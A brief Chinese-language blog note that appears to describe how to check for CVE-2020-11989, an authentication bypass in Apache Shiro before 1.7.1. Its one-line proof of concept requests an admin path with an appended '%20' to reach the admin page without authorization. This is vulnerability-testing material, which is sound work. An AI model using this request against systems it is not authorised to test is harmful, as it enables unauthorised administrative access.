【笔记】CVE-2020-11989漏洞检测

发表于 更新于 阅读次数:

前言

Java的Shiro框架漏洞检测

漏洞利用前提

  • Apache Shiro < 1.7.1

poc

request
1
GET http://example.com/admin/%20
  • 如果可以绕过Shiro直接进入管理员页面,说明存在漏洞

完成